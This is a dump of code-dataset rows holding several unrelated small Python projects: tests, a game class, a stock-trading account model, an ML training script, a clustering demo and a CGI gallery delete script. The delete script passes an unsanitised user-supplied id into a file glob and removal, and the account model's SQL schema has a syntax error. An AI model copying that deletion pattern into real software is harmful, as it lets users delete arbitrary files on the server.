blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
36d7aaf1239c27b5a144870cda82fb54a646e143 | 50ea96a7b912789185b9e51c97b780ce5b3e1511 | /Tests/test_XmasHacker.py | a8e0afc51191f98936ebd05065081bc8c6589354 | [] | no_license | valies/AoC2020 | d5b88938a5370cbe0f1cf36d233b3073286ca155 | 1c47b0d796e0accb7d5bc4f2259a13194a2ecdd2 | refs/heads/master | 2023-03-20T10:25:59.925044 | 2021-03-13T13:59:21 | 2021-03-13T13:59:21 | 318,211,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | import unittest
from Day9.xmasHacker import XmasHacker
class TestXmasHacker(unittest.TestCase):
def test_xmas_hacker_part1(self):
lines = [35, 20, 15, 25, 47, 40, 62, 55, 65, 95, 102, 117, 150, 182, 127, 219, 299, 277, 309, 576]
result = XmasHacker.find_culprit_part1(lines, 5)
self.assertEqual(result, 127, "Should be the same.")
def test_xmas_hacker_part2(self):
lines = [35, 20, 15, 25, 47, 40, 62, 55, 65, 95, 102, 117, 150, 182, 127, 219, 299, 277, 309, 576]
result = XmasHacker.find_sum_part2(lines, 5)
self.assertEqual(result, 62, "Should be the same.")
| [
"da_valies@hotmail.com"
] | da_valies@hotmail.com |
d8611bb01cbb911f726ce7d79586778f290e47ee | f5a002ae3b12a750fa3c777e8ce239677d0f8db5 | /gst_reports/models.py | 88b3a5117472965d2aa359f1c95d926b75f0228f | [] | no_license | abhishek-ag2000/working123 | f217911c6f54091b6412f1bf7e594998cab5cbda | e9e07d98011a4db812d06e50de4063e305dbc1d9 | refs/heads/master | 2022-12-14T03:54:54.064379 | 2019-09-14T14:10:58 | 2019-09-14T14:10:58 | 188,194,278 | 0 | 0 | null | 2022-12-08T05:21:08 | 2019-05-23T08:37:53 | JavaScript | UTF-8 | Python | false | false | 18 | py | """
Models
"""
| [
"abhishek.ag2000@gmail.com"
] | abhishek.ag2000@gmail.com |
96fea94e22cbfaaf30129754654274287d356dc6 | e1015c6a022d3c7c631262076b81f422e04b97f1 | /manage.py | dfb727b7f679d970d1dadbe86e976ccf78468678 | [] | no_license | mikaeltheimer/mdq_api | aa9e9a7286c881319b2e526550782e41755cace9 | 8ed7eaa4acf8592e996b6f02523e8a599b81f5f4 | refs/heads/master | 2021-01-20T03:40:24.636280 | 2014-06-22T01:27:54 | 2014-06-22T01:27:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mdq.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"me@hownowstephen.com"
] | me@hownowstephen.com |
40a96d6da20ca24cb48bf2ecfa5d1d8e91736e5c | 787ca5f82814a58c63cf3d8c0ec02082c40420de | /sbfury/golpe.py | 44f94c69909c812085dd0cff319e7226e67c4fad | [] | no_license | hugoruscitti/sbfury | 72e586354b7cb88532bcfbe5705a66b1008710cb | 474ce8304c45e63214184cde50f2976724fd8455 | refs/heads/master | 2020-06-29T19:03:25.284388 | 2013-01-02T04:15:09 | 2013-01-02T04:15:09 | 4,811,263 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,851 | py | # -*- encoding: utf-8 -*-
# Shaolin's Blind Fury
#
# Copyright: Hugo Ruscitti
# Web: www.losersjuegos.com.ar
import pilas
from configuracion import DEPURACION
import efecto_golpe
import random
class Golpe(pilas.actores.Actor):
"""Representa un golpe (invisible) que un actor emite a otro."""
def __init__(self, actor, enemigos, dx, dy):
pilas.actores.Actor.__init__(self)
self.imagen = 'colision.png'
self.actor = actor
self.dx = dx
self.dy = dy
self.enemigos = enemigos
self.actualizar()
def actualizar(self):
if self.actor.espejado:
self.x = self.actor.x - 70 - self.dx
else:
self.x = self.actor.x + 70 + self.dx
self.y = self.actor.y + self.actor.altura_del_salto + self.dy
def verificar_colisiones(self):
for enemigo in self.enemigos:
area = [
enemigo.izquierda + 10,
enemigo.derecha - 10,
enemigo.abajo,
enemigo.arriba,
]
if enemigo.puede_ser_golpeado:
# colisión horizontal y vertical de caja contra punto.
if area[0] < self.x < area[1] and area[2] < self.y < area[3]:
# verificando que están casi en el mismo plano z.
if abs(enemigo.y - self.actor.y) < 15:
if enemigo.altura_del_salto < 80:
self.crear_efecto_de_golpe()
return enemigo
def dibujar(self, aplicacion):
if DEPURACION:
pilas.actores.Actor.dibujar(self, aplicacion)
def crear_efecto_de_golpe(self):
dx = random.randint(-10, 10)
dy = random.randint(-10, 10)
efecto_golpe.EfectoGolpe(self.x + dx, self.y + dy)
| [
"hugoruscitti@gmail.com"
] | hugoruscitti@gmail.com |
4d481472bad08829b53f8d4c2d484a12c46618e7 | 27e691f8af9d023105feb57260ab5353b2cf10b7 | /model/account.py | 2e10a81b4c0e78eb9075c6f2faa4e3b4ab638010 | [] | no_license | Ssawalha/Deployable-TTrader | 8e9a617c4e09b6aa229270c99ad809b0f7743da1 | b7bba5b6ab596f8b2a9bc8cb1b7730850ade311a | refs/heads/master | 2020-06-24T04:36:32.847363 | 2019-08-13T19:50:52 | 2019-08-13T19:50:52 | 198,851,228 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,820 | py | import sqlite3
from time import time
from collections import OrderedDict
from model.orm import ORM
from model import util
from model import position as p
from model import trade as t
from random import randint
class Account(ORM):
tablename = "accounts"
fields = ["username", "password_hash", "balance", "api_key", "first", "last"]
createsql = '''CREATE TABLE {} (
pk INTEGER PRIMARY KEY AUTOINCREMENT,
username VARCHAR NOT NULL,
password_hash TEXT,
balance FLOAT,
first VARCHAR,
last VARCHAR,
api_key VARCHAR(256),
UNIQUE(username),
UNIQUE(api_key),
);'''.format(tablename)
def __init__(self, **kwargs):
self.values = OrderedDict()
self.values['pk'] = kwargs.get('pk')
self.values['username'] = kwargs.get('username')
self.values['password_hash'] = kwargs.get('password_hash')
self.values['balance'] = kwargs.get('balance')
self.values['first'] = kwargs.get('first')
self.values['last'] = kwargs.get('last')
self.values['api_key'] = kwargs.get('api_key')
def __repr__(self):
msg = '<Account pk:{pk}, username:{username}, password_hash:{password_hash}, balance:{balance}, first:{first}, last:{last}, api_key:{api_key}>'
return msg.format(**self.values)
def json(self):
return {
'pk':self.values['pk'],
'username':self.values['username'],
'password_hash':self.values['password_hash'],
'balance':self.values['balance'],
'first':self.values['first'],
'last':self.values['last'],
'api_key':self.values['api_key']
}
@classmethod
def api_authenticate(cls, api_key):
return cls.one_from_where_clause("WHERE api_key = ?",(api_key,))
def generate_api_key(self):
rand_key = str(randint(1000000000000000000,99999999999999999999))
self.values['api_key'] = rand_key
self.save()
def set_password(self, password):
self.values['password_hash'] = util.hash_password(password)
@classmethod
def login(cls, username, password):
""" login: is a class method of Account class,
\nit checks the username and password_hash
\nin ttrader.db accounts table
\nand returns an instance of that account"""
check_password_bool = util.check_password(username, password)
if check_password_bool == True:
return cls.one_from_where_clause("WHERE username = ?",(username,))
def get_positions(self):
return p.Position.all_with_username(self.values['username'])
def get_position_for(self, ticker):
""" return a Position object for the user. if the position does not
exist, return a new Position with zero shares."""
ticker = ticker.lower()
position = p.Position.one_from_where_clause(
"WHERE ticker =? AND username =?", (ticker, self.values['username']))
if position is None:
return p.Position(username=self.values['username'], ticker=ticker, shares=0)
return position
def get_trades(self):
""" return all of the user's trades ordered by time. returns a list of
Trade objects """
trades_lst = t.Trade.all_with_username(self.values['username'])
return trades_lst
def trades_for(self, ticker):
""" return all of the user's trades for a given ticker. """
ticker = ticker.lower()
trades_lst = t.Trade.all_from_where_clause(
"WHERE ticker =? AND username =?", (ticker, self.values['username']))
return trades_lst
def buy(self, ticker, amount):
""" make a purchase! raise KeyError for a nonexistent stock and
ValueError for insufficient funds. will create a new Trade and modify
a Position and alters the user's balance. returns nothing """
ticker = ticker.lower()
amount = int(amount)
try:
ticker_price = util.lookup_price(ticker)
if (ticker_price * amount) > self.values['balance']:
raise ValueError
else:
self.values['balance'] = (self.values['balance'] - ticker_price * amount)
self.save()
transaction = t.Trade(buy_sell = 'Buy', username = self.values['username'],
ticker = ticker, price = ticker_price,
shares = amount, time = time())
transaction.save()
position = self.get_position_for(ticker) #
position.values['shares'] = (position.values['shares'] + amount)
position.save()
except:
raise KeyError
def sell(self, ticker, amount):
""" make a sale! raise KeyError for a non-existent Position and
ValueError for insufficient shares. will create a new Trade object,
modify a Position, and alter the self.balance. returns nothing."""
ticker = ticker.lower()
amount = int(amount)
try:
ticker_price = util.lookup_price(ticker)
position = self.get_position_for(ticker)
if position.values['shares'] < amount:
raise ValueError
else:
position.values['shares'] -= amount
position.save()
transaction = t.Trade(buy_sell = 'Sell', username = self.values['username'],
ticker = ticker, price = ticker_price,
shares = amount, time = time())
transaction.save()
self.values['balance'] += (ticker_price * amount)
self.update_row()
except:
raise KeyError
def ticker_buy_lst(self, ticker):
ticker_trades_lst = self.trades_for(ticker)
buy_trades = []
for trade in ticker_trades_lst:
if trade.values['buy_sell'] == 'Buy':
buy_trades.append(trade)
return buy_trades
def ticker_sell_lst(self, ticker):
ticker_trades_lst = self.trades_for(ticker)
sell_trades = []
for trade in ticker_trades_lst:
if trade.values['buy_sell'] == 'Sell':
sell_trades.append(trade)
return sell_trades
def buy_market_value(self, ticker):
buy_lst = self.ticker_buy_lst(ticker)
market_value = 0
for trade in buy_lst:
market_value += (trade.values['shares'] * trade.values['price'])
return market_value
def buy_trade_volume(self, ticker):
buy_lst = self.ticker_buy_lst(ticker)
trade_volume = 0
for trade in buy_lst:
trade_volume += trade.values['shares']
return trade_volume
def sell_market_value(self, ticker):
sell_lst = self.ticker_sell_lst(ticker)
market_value = 0
for trade in sell_lst:
market_value += (trade.values['shares'] * trade.values['price'])
return market_value
def sell_trade_volume(self, ticker):
sell_lst = self.ticker_sell_lst(ticker)
trade_volume = 0
for trade in sell_lst:
trade_volume += trade.values['shares']
return trade_volume
def profit_loss(self, ticker):
buy_mkt_value = self.buy_market_value(ticker)
sell_mkt_value = self.sell_market_value(ticker)
net_mkt_value = sell_mkt_value - buy_mkt_value
buy_mkt_volume = self.buy_trade_volume(ticker)
sell_mkt_volume = self.sell_trade_volume(ticker)
net_mkt_volume = buy_mkt_volume - sell_mkt_volume
if net_mkt_volume > 0:
return (net_mkt_volume * util.lookup_price(ticker)) + net_mkt_value
else:
return net_mkt_value | [
"sami_sawalha@hotmail.com"
] | sami_sawalha@hotmail.com |
b4df791f6b5714998c3eed2619b3569d1db70e59 | 865d120bfe9ee0cc3474ae5c5ddd68992c60ef91 | /test_args.py | 0bb04f3408c68a3f8779e347ed7a29c70064b05a | [] | no_license | JiangWeiFanAI/High-resolution-seasonal-climate-forecast_v1_csiro | 6462ba540ab908f915c0213033b7a34f262680bc | e282092f427069817187d10a750a6a8cf2c1ea88 | refs/heads/master | 2020-11-28T02:33:05.006899 | 2020-03-10T08:14:11 | 2020-03-10T08:14:11 | 229,681,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,409 | py | import os
import data_processing_tool as dpt
from datetime import timedelta, date, datetime
from args_parameter import args
from PrepareData import ACCESS_BARRA_v1,ACCESS_BARRA_v2
import torch,os,torchvision
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import DataLoader,random_split
from torchvision import datasets, models, transforms
import torch.nn as nn
import torch.optim as optim
# from PIL import Image
import time
import model
import utility
from tqdm import tqdm
import math
import xarray as xr
from skimage.measure import compare_ssim
from skimage.measure import compare_psnr,compare_mse
import platform
sys = platform.system()
init_date=date(1970, 1, 1)
start_date=date(1990, 1, 2)
end_date=date(2012,12,25)
if sys == "Windows":
args.file_ACCESS_dir="H:/climate/access-s1/"
args.file_BARRA_dir="D:/dataset/accum_prcp/"
init_date=date(1970, 1, 1)
start_date=date(1990, 1, 2)
end_date=date(1990,12,25)
else:
args.file_ACCESS_dir_pr="/g/data/ub7/access-s1/hc/raw_model/atmos/pr/daily/"
args.file_ACCESS_dir="/g/data/ub7/access-s1/hc/raw_model/atmos/"
# training_name="temp01"
args.file_BARRA_dir="/g/data/ma05/BARRA_R/v1/forecast/spec/accum_prcp/"
args.channels=0
if args.pr:
args.channels+=1
if args.zg:
args.channels+=1
if args.psl:
args.channels+=1
if args.tasmax:
args.channels+=1
if args.tasmin:
args.channels+=1
access_rgb_mean= 2.9067910245780248e-05*86400
leading_time=217
args.leading_time_we_use=7
args.ensemble=2
print("training statistics:")
print(" ------------------------------")
print(" trainning name | %s"%args.train_name)
print(" ------------------------------")
print(" num of channels | %5d"%args.channels)
print(" ------------------------------")
print(" num of threads | %5d"%args.n_threads)
print(" ------------------------------")
print(" batch_size | %5d"%args.batch_size)
print(" ------------------------------")
print(" using cpu only? | %5d"%args.cpu)
def main():
start=time.time()
checkpoint = utility.checkpoint(args)
checkpoint.my_write_log("Let's use"+str(torch.cuda.device_count())+"GPUs!")
checkpoint.my_write_log("start")
batch=1
checkpoint.my_write_log("Train for batch %d,data loading time cost %f s"%(batch,start-time.time()))
if __name__=='__main__':
main()
| [
"45549842+JiangWeiFanAI@users.noreply.github.com"
] | 45549842+JiangWeiFanAI@users.noreply.github.com |
39adda87b74dd84e828aa911f336be7f59c02608 | dadafb6eb3d56cf3d9dc8f5ed96ae9bb32a3b465 | /PythonStudy/FirstPythonPro/douban_movie.py | 8367f3d17536d63fae19eebd652de07da28fb34a | [] | no_license | FLShan/DataAnalysis | 75049dba02419f8fc30e78b8a29c7af41672dcc5 | 19073432e73bff529f2f44b47cfbfdd6a70ae921 | refs/heads/master | 2021-05-12T06:11:41.188300 | 2019-03-27T09:48:00 | 2019-03-27T09:48:00 | 117,212,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,396 | py | # !/usr/bin/env python
# encoding=utf-8
import requests
import re
import codecs
from bs4 import BeautifulSoup
from openpyxl import Workbook
wb = Workbook()
dest_filename = '电影.xlsx'
ws1 = wb.active
ws1.title = "电影top250"
DOWNLOAD_URL = 'http://movie.douban.com/top250/'
def download_page(url):
"""获取url地址页面内容"""
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36'
}
data = requests.get(url, headers=headers).content
return data
def get_li(doc):
soup = BeautifulSoup(doc, 'html.parser')
ol = soup.find('ol', class_='grid_view')
name = [] # name
star_con = []
score = []
info_list = []
for i in ol.find_all('li'):
detail = i.find('div', attrs={'class': 'hd'})
movie_name = detail.find(
'span', attrs={'class': 'title'}).get_text()
level_star = i.find(
'span', attrs={'class': 'rating_num'}).get_text() # 评分
star = i.find('div', attrs={'class': 'star'})
star_num = star.find(text=re.compile('评价'))
info = i.find('span', attrs={'class': 'inq'}) # 短评
if info: # 判断是否有短评
info_list.append(info.get_text())
else:
info_list.append('无')
score.append(level_star)
name.append(movie_name)
star_con.append(star_num)
page = soup.find('span', attrs={'class': 'next'}).find('a')
if page:
return name, star_con, score, info_list, DOWNLOAD_URL + page['href']
return name, star_con, score, info_list, None
def main():
url = DOWNLOAD_URL
name = []
star_con = []
score = []
info = []
while url:
doc = download_page(url)
movie, star, level_num, info_list, url = get_li(doc)
name = name + movie
star_con = star_con + star
score = score + level_num
info = info + info_list
for (i, m, o, p) in zip(name, star_con, score, info):
col_A = 'A%s' % (name.index(i) + 1)
col_B = 'B%s' % (name.index(i) + 1)
col_C = 'C%s' % (name.index(i) + 1)
col_D = 'D%s' % (name.index(i) + 1)
ws1[col_A] = i
ws1[col_B] = m
ws1[col_C] = o
ws1[col_D] = p
wb.save(filename=dest_filename)
if __name__ == '__main__':
main() | [
"shanfangliang@163.com"
] | shanfangliang@163.com |
8e6f2005191fbcdb014cc5df3403ff2e8328714a | 9ff63b122f833b498529a6d85afda3615fc620eb | /BOJ/15921.py | 89d87631383cda1f561a7f6eb28e28a4c9d526ae | [] | no_license | jang010505/Algorithm | 7bbb9f1a5c087a3ac53b9a02e6b633aa81ec1a29 | 3442a492284decfdd3a727fc5fe9cfd9471096be | refs/heads/master | 2023-03-14T02:19:36.255303 | 2021-03-04T15:07:02 | 2021-03-04T15:07:02 | 299,441,113 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | n=int(input())
if n: print("1.00")
else: print("divide by zero")
| [
"noreply@github.com"
] | jang010505.noreply@github.com |
b712ff46278675d218e9efd11213d97ab19c4e89 | be028671344cce87c0cea4a1f839c68eccb330f4 | /scrapy/who/who_surname_processor.py | 5adea363d0fbffb81c1e3b70dc6cd67a770a69d3 | [] | no_license | taylor3lewis/kipling | 7b3046fba752f4e8d6e41953357a64da18b704c1 | d5b8e789a1fcc6825e8b973fc0d70ee8fbd7b03a | refs/heads/master | 2020-04-07T01:17:37.314470 | 2018-11-21T20:19:02 | 2018-11-21T20:19:02 | 157,937,218 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | # coding: utf-8
from glob import glob
lines = []
for f in glob('data/SOBRENOME*'):
print f
fl = open(f, 'r')
lines += fl.readlines()
fl.close()
py_file = open('who.py', 'w')
py_file.write('# coding: utf-8\n')
py_file.write('SURNAMES = {')
buff = ''
unique = set()
for line in lines:
line = line.strip('\n')
if line not in unique:
unique.add(line.strip('\n'))
buff += 'u"%s":None,' % line.strip('\n')
py_file.write(buff[:-1])
py_file.write('}')
py_file.close()
| [
"taylor3lewis@gmail.com"
] | taylor3lewis@gmail.com |
1768c1f480715adfacad2c6422c0cffce728714a | 596d151b6fb6b58595d3d99f13685b3a12465a7c | /01 第一周 机器学习之无监督学习/单元1 聚类/02 KMeans/消费水平(KMeans).py | eb752661e94404827fe8969388bbd4181df8829e | [] | no_license | git-zzf/PythonMachineLearning | 9ce54558f0d24525c07024cc7731eeac316482b8 | 7aae13583d97498081caa459b1c1e387784af8c5 | refs/heads/master | 2022-04-24T15:51:40.830970 | 2020-04-29T05:42:00 | 2020-04-29T05:42:00 | 258,816,292 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,546 | py | import numpy as np
from sklearn.cluster import KMeans
path = r"E:/Notes/PythonMachineLearning/01 第一周 机器学习之无监督学习/单元1 聚类/01 全国31省消费水平/31省市居民家庭消费水平-city.txt"
def loadData(filePath):
fr = open(filePath, 'r+') # r+表示读写打开方式
lines = fr.readlines() # 返回全部行,以列表储存在lines中
retData = [] # 用来储存数据部分,包含城市名和消费水平
retCityName = [] # 用来储存城市名称
for line in lines:
items = line.strip().split(",") # 数据是用逗号分隔的)
retCityName.append(items[0]) # 每行数据的第一个元素是城市名
retData.append([float(items[i]) for i in range(1,len(items))])
return retData,retCityName
if __name__ == '__main__':
data,cityName = loadData(path) # 读取数据
km = KMeans(n_clusters = 4) # 调用KMeans函数
label = km.fit_predict(data) # 分类算法,返回值是每个城市对应的类别名称,从0到3编号
expenses = np.sum(km.cluster_centers_, axis=1) # 计算8种消费水平的总和,用来展示结果
CityCluster = [[], [], [], []] # 使用二维列表接收分类后的城市名,共有4类
for i in range(len(cityName)):
CityCluster[label[i]].append(cityName[i]) # 把每个城市的名称添加到对应的类别中
for i in range(len(CityCluster)): # 按类别打印消费水平和类别中的城市名
print("Expenses:%.2f" % expenses[i])
print(CityCluster[i])
| [
"hfxxwilliam@gamil.com"
] | hfxxwilliam@gamil.com |
90990c832821edc13bd914233d448ee7c9f16b46 | cb3db5736ee11832572dc1c2243383e595f7ffd1 | /src/experiments/final_spiking_loo_wta_mean.py | de7e316d2c725760d9a3ef45041b832268d75fef | [
"MIT"
] | permissive | GustavEye/spiking-radar-gestures | 7c5c473cabad483860727cd4002eefd1912822a4 | a0fe738245a42596e5828a16244342699980ac46 | refs/heads/main | 2023-09-03T21:22:25.459739 | 2021-11-08T10:09:30 | 2021-11-08T10:09:30 | 425,784,173 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,151 | py | import tensorflow as tf
from tensorboard.plugins.hparams import api as hp
from src.neuron_models import wta_layer, lif_neuron
HPARAMS = [
hp.HParam('pool_size', hp.Discrete([4])),
hp.HParam('wta_threshold', hp.Discrete([0.05])),
hp.HParam('n_neurons_1', hp.Discrete([75])),
hp.HParam('dropout_1', hp.Discrete([0.3])),
hp.HParam('dropout_2', hp.Discrete([0.0])),
hp.HParam('decay_train_mode', hp.Discrete([1])),
hp.HParam('threshold_train_mode', hp.Discrete([1])),
hp.HParam('seed', hp.Discrete([1211]))
]
METRICS = [
hp.Metric("epoch_sparse_categorical_accuracy", group="train", display_name="accuracy (train)",),
hp.Metric("epoch_loss", group="train", display_name="loss (train)",),
hp.Metric("epoch_sparse_categorical_accuracy", group="validation", display_name="accuracy (val.)",),
hp.Metric("epoch_loss", group="validation", display_name="loss (val.)",),
hp.Metric("info_n_trainable", display_name="n_trainable",),
hp.Metric("best_val", display_name="best_val",),
hp.Metric("best_val_arg", display_name="best_val_arg",),
]
def create_model(shape_in, n_out, hparams):
tau_v = 10.0
inputs = tf.keras.layers.Input(shape=shape_in)
mid = tf.keras.layers.MaxPooling3D(pool_size=(1,1,hparams['pool_size']))(inputs)
mid = wta_layer.WTA_mean()(mid)
mid = tf.keras.layers.Reshape((shape_in[0], -1))(mid)
mid = tf.keras.layers.Dropout(hparams['dropout_1'])(mid)
mid_z, v = tf.keras.layers.RNN(lif_neuron.RecurrentLifNeuronCell(
hparams['n_neurons_1'],
decay_train_mode=hparams['decay_train_mode'],
threshold_train_mode=hparams['threshold_train_mode'],
tau=tau_v,
), return_sequences=True, name='LIF_recurrent_01')(mid)
out_z, v = tf.keras.layers.RNN(lif_neuron.LiNeuronCell(
n_out,
), return_sequences=False, name='out')(mid_z)
model = tf.keras.Model(inputs=inputs, outputs=[out_z])
model.compile(
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),
optimizer="adam",
metrics=["sparse_categorical_accuracy"],
run_eagerly=False
)
return model | [
"daniel.auge@tum.de"
] | daniel.auge@tum.de |
cc0c7f3391c999eb34f4a93e7b664773a4712134 | 63037550c61b1b779c6e79a94722d130565789b8 | /src/main.py | 40acb63ee12fc08859f7b091fbc1ded8397e5d23 | [
"MIT"
] | permissive | Kei198403/python-template | 598ec31fe1038d5996442568ac12aa9887e9bee2 | 777427b0fddaadb5030a39a3445a7de53b232943 | refs/heads/main | 2023-04-22T14:24:53.911713 | 2021-05-07T13:18:47 | 2021-05-07T13:18:47 | 365,227,015 | 0 | 0 | null | 2021-05-07T13:18:47 | 2021-05-07T12:30:52 | Dockerfile | UTF-8 | Python | false | false | 152 | py | # -*- coding: utf-8 -*-
def sample() -> str:
return "hoge"
def main() -> None:
print("Hello Python")
if __name__ == "__main__":
main()
| [
"74121135+Kei198403@users.noreply.github.com"
] | 74121135+Kei198403@users.noreply.github.com |
01509e3cb94f4932fe35bb4db8fbf15445461508 | 81eceea57d570fa1f9f6468875b1b06b8de9f0f0 | /.history/block_20200624172716.py | ca5c135349d1728a51d30bcf28a737626975d11e | [] | no_license | digg2414/python-blockchain | fe9cdab754123eddef660c39ffb4c0c6b0e99523 | 36c4df03bdd71dbd58663ee4b16f6a72f02d401f | refs/heads/master | 2022-11-05T01:08:44.229492 | 2020-06-24T23:11:41 | 2020-06-24T23:11:41 | 274,786,987 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | import time
def mine_block(last_block, data):
"""
Mine a block based on the last_block and the data.
"""
times_stamp
class Block():
"""
Block: a unit of storage.
Store transactions in a blockchain that supports a cryptocurrency.
"""
def __init__(self, timestamp, last_hash ,data, hash):
self.data = data
self.timestamp = timestamp
self.last_hash = last_hash
self.hash = hash
def __repr__(self):
return (
'Block: ('
f'timestamp: {self.timestamp}, '
f'last_hash: {self.last_hash}, '
f'hash: {self.hash}, '
f'data: {self.data}'
)
def main():
block = Block('foo')
print(block)
print(f'block.py __name__: {__name__}')
if __name__ == '__main__':
main()
| [
"JHarold1241@outlook.com"
] | JHarold1241@outlook.com |
1cca9ab09d7162c952c43e3c5f2e899f5f790b69 | 75bcfd59fe9e3647d7e8b74115108710a122ff9c | /fixture/support.py | 0c5f43aa3e01d60db36c1160d274d3ed4a8a9805 | [
"Apache-2.0"
] | permissive | VinnieJohns/barancev_python_training | ebc36271ae745d58d286da337b59bd1d169d9ba6 | 10627548f2d797575f239fef6de345bc0d44921a | refs/heads/master | 2021-01-10T20:35:53.711646 | 2015-05-12T20:55:09 | 2015-05-12T20:55:09 | 31,509,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | __author__ = 'VinnieJohns'
import random
import string
def random_string(prefix, maxlen):
# ' and spaces signs are replaced to avoid known failures
symbols = string.ascii_letters + string.digits + string.punctuation.replace("'", "") + " "*10
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))]).replace(" ", " ")
months_list = ["January", "February", "March",
"April", "May", "June",
"July", "August", "September",
"October", "November", "December"]
| [
"novikov.d12@gmail.com"
] | novikov.d12@gmail.com |
326379cea86e0516daf08cfd4161e352da2b6c0a | 21ab826db670e26024050536f0e2c5a6354d53cf | /project-euler/p015.py | 6960b8726d68fc57732635cd32e42e1704994fcc | [] | no_license | mingrammer/problem-solving | 32a6cba9545fcb7cda99314c9fb6d68dd94de985 | d9cd8aaea6dcbe79b4689634ffc92eee0031cc65 | refs/heads/master | 2022-11-26T15:46:39.372093 | 2020-08-01T11:00:58 | 2020-08-01T11:00:58 | 36,556,280 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | # Lattice paths
from math import factorial as f
n = 20
print(f(2*n) / (f(n)**2))
| [
"mingrammer@gmail.com"
] | mingrammer@gmail.com |
881504c3abee2e2338c4e7c12b8138d4dad30849 | 6581d4f7607f11ee46a29f5a2a00264bd4b1b188 | /4131-Internet_Programming/assignment5-cgi-gallery-multiuser/delete.cgi | ae39e61ba6e6ecb298ede5a53265f3640c4fa41f | [] | no_license | marvintv/apollo-academia-umn | 099bccd9bc33f70b9ea6b24d9fa02cf06196446c | a283d50eff1d0e7c158479ddc8e17932d518104a | refs/heads/master | 2021-05-31T05:05:34.292432 | 2016-04-25T06:44:35 | 2016-04-25T06:44:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,675 | cgi | #!/usr/bin/python
import cgi
import os
import glob
from shared import * # import common templates and variables
from database import * # import database to check role
form = cgi.FieldStorage()
fileid = form.getvalue("id")
title = ""
msg = ""
success = False
# check if logged in and if owner
if not isLoggedIn():
REDIRECT('login.html')
else:
db = Database()
if not db.isOwnerFromCookie():
REDIRECT('gallery.cgi')
# check query string (if GET) and display relevant message, else delete with POST
if os.environ['REQUEST_METHOD'] == 'GET':
if fileid is not None:
try:
filePath = os.path.join(UPLOAD_DIR, fileid + ".txt")
title = getTitle(filePath)
except Exception as e:
msg = """<div id="message"> Invalid ID. Please return to the <a href="gallery.cgi">Gallery </a> to select a VALID image for deletion. </div>"""
else:
msg = """<div id="message"> Please return to the <a href="gallery.cgi">Gallery </a> to select an image for deletion. </div>"""
else: # delete the files!
filePath = os.path.join(UPLOAD_DIR, fileid + ".jpg")
if os.path.isfile(filePath):
try:
for fileName in glob.glob(os.path.join(UPLOAD_DIR, fileid + "*")): # much cleaner
os.remove(fileName)
success = True # writing true wasted my half an hour, tired.
msg = "NOT NONE"
except Exception as e:
msg = """<div id="message"> Something went wrong, could not delete image. Please try again. """
else:
msg = """<div id="message"> Something went wrong, or image has already been deleted. Please try another. """
deleteForm = """
<form name="deleteForm" action="delete.cgi" method="POST" enctype="multipart/form-data">
%(msg)s
Are you sure? You want to delete picture [ %(title)s ]. <br/>
<input name="id" type="hidden" value="%(fileid)s"/>
<button name="submit" type="submit"> Yes </button>
<a href="gallery.cgi"> <button type="button">Cancel</button></a>
</form>
""" % { 'title' : title, 'msg': msg, 'fileid': fileid }
strings = {
'windowTitle': "Delete Photo",
'title': "Delete Picture",
'body': deleteForm
}
if os.environ['REQUEST_METHOD'] == 'GET':
if msg != "":
strings['body'] = msg
print 'content-type: text/html\n'
print HTML_TEMPLATE % strings
# Only true here if we post and fail the top conditons. Else redirected.
if not success and os.environ['REQUEST_METHOD'] == 'POST':
strings['body'] = msg
print 'content-type: text/html\n'
print HTML_TEMPLATE % strings
if success and os.environ['REQUEST_METHOD'] == 'POST':
REDIRECT('gallery.cgi')
| [
"leewenchuan.lwc@gmail.com"
] | leewenchuan.lwc@gmail.com |
